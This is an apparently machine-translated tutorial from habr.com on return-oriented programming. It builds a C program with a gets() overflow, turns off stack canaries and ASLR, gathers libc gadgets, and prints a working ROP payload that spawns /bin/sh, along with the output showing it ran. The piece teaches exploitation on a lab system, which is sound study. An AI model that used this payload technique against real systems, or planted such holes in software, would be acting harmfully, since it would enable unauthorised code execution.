Return oriented programming. We collect exploit in pieces

Introduction
In this article we will try to figure out how the Return Oriented exploit works. The topic is, in principle, so hackneyed, and there are a lot of publications in the internet, but I will try to write in such a way that this article is not a simple compilation. Along the way, we will have to deal with some system features of Linux and the x86-64 architecture (all the experiments described below were performed on Ubuntu 14.04). The main goal will be to exploit the trivial vulnerability gets using ROP (Return oriented programming).

Vulnerability
In fact, it is clear that the search for vulnerabilities is a separate problem. It would be nice to start by inventing some simple vulnerability. For example, the gets () function, which is included in the standard C library, is one big vulnerability, and we will use it.

#include <stdio.h> #include <string.h> int func() { int val = 0; char buf[10]; gets(buf); printf("%s\n", buf); val = strlen(buf); return val; } int main(int argc, char **argv) { return func(); }

This code reads from stdin everything that it sees until it stumbles upon the end of line or file character. Generally speaking, the use of this feature is not very welcome and it exists only for backward compatibility. However, I myself have often seen the latest code in which people used this function. Well, God be with him. Let's try to compile (we will talk about the value of -fno-stack-protector later).

 gcc -o main main.c -g -Wall -fno-stack-protector

gcc warned us two more times about the absurdity of our actions (the message may not be available in other gcc assemblies)

 main.c: In function 'func': main.c:7:2: warning: 'gets' is deprecated (declared at /usr/include/stdio.h:638) [-Wdeprecated-declarations] gets(buf); ^ /tmp/ccBFHgPN.o: In function `func': /home/alexhoppus/Desktop/rop_tutorial/main.c:7: warning: the `gets' function is dangerous and should not be used.

Well, let's understand what he is babbling about dangerous and deprecated.
Smash the stack
From the code above it is clear that there is a buffer in which the string is read. The buffer is on the stack. As you know, a stack is no more than a piece of rw memory in the address space of an application. Let's try restoring its layout to x86-64. We will do this with the objdump utility, and then check with gdb.

 objdump -d main 00000000004005bd <func>: 4005bd: 55 push %rbp 4005be: 48 89 e5 mov %rsp,%rbp 4005c1: 48 83 ec 10 sub $0x10,%rsp 4005c5: c7 45 fc 00 00 00 00 movl $0x0,-0x4(%rbp) 4005cc: 48 8d 45 f0 lea -0x10(%rbp),%rax 4005d0: 48 89 c7 mov %rax,%rdi 4005d3: e8 e8 fe ff ff callq 4004c0 <gets@plt> 4005d8: 48 8d 45 f0 lea -0x10(%rbp),%rax 4005dc: 48 89 c7 mov %rax,%rdi 4005df: e8 9c fe ff ff callq 400480 <puts@plt> 4005e4: 48 8d 45 f0 lea -0x10(%rbp),%rax 4005e8: 48 89 c7 mov %rax,%rdi 4005eb: e8 a0 fe ff ff callq 400490 <strlen@plt> 4005f0: 89 45 fc mov %eax,-0x4(%rbp) 4005f3: 8b 45 fc mov -0x4(%rbp),%eax 4005f6: c9 leaveq 4005f7: c3 retq 00000000004005f8 <main>: 4005f8: 55 push %rbp 4005f9: 48 89 e5 mov %rsp,%rbp 4005fc: 48 83 ec 10 sub $0x10,%rsp 400600: 89 7d fc mov %edi,-0x4(%rbp) 400603: 48 89 75 f0 mov %rsi,-0x10(%rbp) 400607: b8 00 00 00 00 mov $0x0,%eax 40060c: e8 ac ff ff ff callq 4005bd <func> 400611: c9 leaveq 400612: c3 retq 400613: 66 2e 0f 1f 84 00 00 nopw %cs:0x0(%rax,%rax,1) 40061a: 00 00 00 40061d: 0f 1f 00 nopl (%rax)

Let's start with the line in main, which makes the call to func (40060c). callq can be represented as push return address (400611) and jump to func. Thus, the return address is put on the stack first. When we jumped on func, we pushed onto the% rbp stack — the start address of the previous frame stack. Next, we expand the stack (the stack grows down) by 16 bytes and zeroes the first 4 bytes after the saved% rbp - apparently, this is our variable val on the stack. The gets function is passed a pointer to the buffer through the% rdi register, which is calculated as follows lea -0x10 (% rbp),% rax. We summarize the picture:

From the picture we can conclude that if we write a string with more than 15 characters (+1 byte line end) into the buffer, our application will most likely fall down, since we will overwrite% rbp - the start address of the previous frame stack. At the same time, we’ll go to main normally from the current function func, but then we will have problems - the program will think that its stack is not at all where it actually is, and since the% rip is the return address, we return get SIGSEGV from the Linux kernel when we return to the wrong address.
Now look at the stack in terms of gdb:

 python -c "print 'a'*15" > input2 gdb ./main (gdb) b func Breakpoint 1 at 0x4005c5: file main.c, line 5. (gdb) r < input2 (gdb) info register ... rsp 0x7fffffffde90 0x7fffffffde90 ... (gdb) x/100x 0x7fffffffde90 0x7fffffffde90: 0x61616161 0x61616161 0x61616161 0x00616161 0x7fffffffdea0: 0xffffdec0 0x00007fff 0x00400611 0x00000000 0x7fffffffdeb0: 0xffffdfa8 0x00007fff 0x00000000 0x00000001

Now we can finally be sure that we were not mistaken. Try typing more than 15 characters on stdin and make sure that the application receives SIGSEGV. Now it's time to return to the -fno-stack-protector option. Repeat this trick without it (note: I have this option turned on by default - this is a gcc build, you may have the opposite).

 gcc -o main main.c -g -Wall python -c "print 'a'*26" | ./main aaaaaaaaaaaaaaaaaaaaaaaaaa *** stack smashing detected ***: ./main terminated Aborted (core dumped)

The -fstack-protector flag enables gcc to support buffer overflow protection. The principle of its operation is simple - a value known to the compiler is placed on the stack between% rip,% rbp and the writeable buffer, after exiting the function, the value is read from the stack and compared with the original one. If the face does not match, then we will see a message about stack smashing. You can see for yourself how stack canaries work by simply disassembling objdump -d

 000000000040062d <func>: ... 400635: 64 48 8b 04 25 28 00 mov %fs:0x28,%rax 40063c: 00 00 40063e: 48 89 45 f8 mov %rax,-0x8(%rbp) ... 400675: 48 8b 55 f8 mov -0x8(%rbp),%rdx 400679: 64 48 33 14 25 28 00 xor %fs:0x28,%rdx 400680: 00 00 400682: 74 05 je 400689 <func+0x5c> 400684: e8 77 fe ff ff callq 400500 <__stack_chk_fail@plt> 400689: c9 leaveq 40068a: c3 retq

To simplify your life when writing a ROP exloit, we will compile the application with the -fno-stack-protector flag. This will be the first of two defense mechanisms, which we will deliberately turn off in order to simplify our lives.
Address space layout randomization
Talking about the ASLR, it’s probably worth getting to the point. As you understand, an attacker can overflow the buffer on the stack and overwrite the return address in order to jump to any code. The question remains - where to jump and where does the necessary hacker code come from? It is impossible to throw the code onto the stack, because the stack is not executable. This is provided at the level of the page tables that form the virtual address space of the process, in other words, there is no “X” flag in the page table entry entry. You can jump on zamaplennye libraries, or rather on some pieces of code from these libraries. Return oriented programming is based on this principle. So that it was impossible to guess in advance the address where the library is mapped, and, consequently, the address of a specific piece of code from the library, when the application starts, the position of the library in the address space of the process is randomized. This is a feature of the Linux kernel, which is controlled by the proc.

 echo 0 > /proc/sys/kernel/randomize_va_space

To simplify, it will also have to be disabled.

Exec / bin / sh
Well, the application with the vulnerability is collected without protection against stack overflow, the ASLR is disabled. Now, to demonstrate the vulnerability, let's force the process - the victim to invoke / bin / sh instead of himself. First you need to submit how the exploit code will look like:

 section .text global _start _start: mov rax, 0x3b mov rdi, cmd mov rsi, 0 mov rdx, 0 syscall section .data cmd: db '/bin/sh' .end:

Everything is simple here - on x86-64, the application code makes a system call using the syscall instruction. In this case, it is necessary to place the system call number (0x3b) in% rax, the arguments are placed in the registers% rdi,% rsi,% rdx .... If you forgot what the list of execve arguments looks like, see here.
Check that the shell is invoked:

 nasm -f elf64 exec1.S -o exec.o ld -o exec exec.o ./exec

Gadgets
Generally speaking, a gadget is just a piece of library or application code. Search for gadgets for our future exploit, we will be in libc. To begin with, let's look at what address the code section of the libc is mapped to. To do this, you can stop the application on the main function with gdb and execute:

 cat /proc/`pidof main`/maps | grep libc | grep r-xp

Here the “X” flag in the mapping is important to us, from which we can understand that this is a directly executable section.

 7ffff7a14000-7ffff7bcf000 r-xp 00000000 08:01 466797 /lib/x86_64-linux-gnu/libc-2.19.so

Ideologically, the behavior of the future exploit is shown in the following figure:

We start by putting on the stack instead of the return address addr1, which will point to the first gadget from the libc code. The first gadget will perform pop% rax, placing in the% rax register the value 0x3b we prepared on the stack, then ret will take the address addr2 from the stack and jump to it. As for 0x601000, this is the address of the beginning of the rw region (data section) of the executable file ./main:

 00400000-00401000 r-xp 00000000 08:01 527064 /home/alexhoppus/Desktop/rop_tutorial/main 00600000-00601000 r--p 00000000 08:01 527064 /home/alexhoppus/Desktop/rop_tutorial/main 00601000-00602000 rw-p 00001000 08:01 527064 /home/alexhoppus/Desktop/rop_tutorial/main

We will select this address to put the string "/ bin // sh" on it. In the register% rdx we save the string itself, and in% rdi its address.

 mov qword [rdi], rdx

puts "/ bin // sh" at 0x601000. The main work is done - the rest of the code resets the value of the% rsi and% rdx registers (2 and 3 execve arguments) and executes syscall. Thus, we in 7 return exovnul unsuspecting main and turned it into / bin / sh.
')
How to find gadgets
In fact, there are many utilities that analyze the library / application code and provide you with a set of ready-made gadgets with addresses. This article is used to search for gadgets. Example output gadget search engine:

 ./rp-lin-x64 -f /lib/x86_64-linux-gnu/libc-2.19.so -r 2 | grep "pop rax" ... 0x0019d345: pop rax ; out dx, al ; jmp qword [rdx] ; (1 found) 0x000fafb9: pop rax ; pop rdi ; call rax ; (1 found) 0x000193b8: pop rax ; ret ; (1 found) 0x001a09c8: pop rax ; adc al, 0xF1 ; jmp qword [rax] ; (1 found) ...

To get real addresses of gadgets in memory, you need to add to the addresses obtained in the output an offset equal to the address of the start of mapping of the executable section of the libc (see above) - 0x7ffff7a14000.

And what is the result?
After you find all the necessary gadgets, you’ll have something like

 python -c "print 'a'*24+'\xb8\xd3\xa2\xf7\xff\x7f\x00\x00'+'\x3b\x00\x00\x00\x00\x00\x00\x00'+'\x21\x6a\xa3\xf7\xff\x7f\x00\x00'+'\x00\x10\x60\x00\x00\x00\x00\x00'+'\x8e\x5b\xa1\xf7\xff\x7f\x00\x00'+'\x2f\x62\x69\x6e\x2f\x73\x68\x00'+'\x27\x3c\xa3\xf7\xff\x7f\x00\x00'+'\x14\xa1\xb4\xf7\xff\x7f\x00\x00'+'\x00\x00\x00\x00\x00\x00\x00\x00'+'\x8e\x5b\xa1\xf7\xff\x7f\x00\x00'+'\x00\x00\x00\x00\x00\x00\x00\x00'+'\xd5\x68\xad\xf7\xff\x7f\x00\x00'" | ./main

Check with strace that the shell is actually running. If everything is done correctly, / bin / sh will start and exit immediately, since stdin is already empty. For obvious reasons, in real conditions, no one will connect the stdin of this shell with the keyboard, but we can allow a small hack to test the performance of the exploit:

 alexhoppus@hp:~/Desktop/rop_tutorial$ cat <(python -c "print 'a'*24+'\xb8\xd3\xa2\xf7\xff\x7f\x00\x00'+'\x3b\x00\x00\x00\x00\x00\x00\x00'+'\x21\x6a\xa3\xf7\xff\x7f\x00\x00'+'\x00\x10\x60\x00\x00\x00\x00\x00'+'\x8e\x5b\xa1\xf7\xff\x7f\x00\x00'+'\x2f\x62\x69\x6e\x2f\x73\x68\x00'+'\x27\x3c\xa3\xf7\xff\x7f\x00\x00'+'\x14\xa1\xb4\xf7\xff\x7f\x00\x00'+'\x00\x00\x00\x00\x00\x00\x00\x00'+'\x8e\x5b\xa1\xf7\xff\x7f\x00\x00'+'\x00\x00\x00\x00\x00\x00\x00\x00'+'\xd5\x68\xad\xf7\xff\x7f\x00\x00'") - | ./main aaaaaaaaaaaaaaaaaaaaaaaa Ӣ   ls Blank Flowchart - New Page (2).jpeg article~ exec1.S input main.c shell a.out exec hello input2 rop.jpeg stack.jpeg article

Well that's all. I hope that the article will give ground for your future experiments (not in the practical plane, but scientific and informative).

Source: https://habr.com/ru/post/255519/

All Articles

Return oriented programming. We collect exploit in pieces

More articles: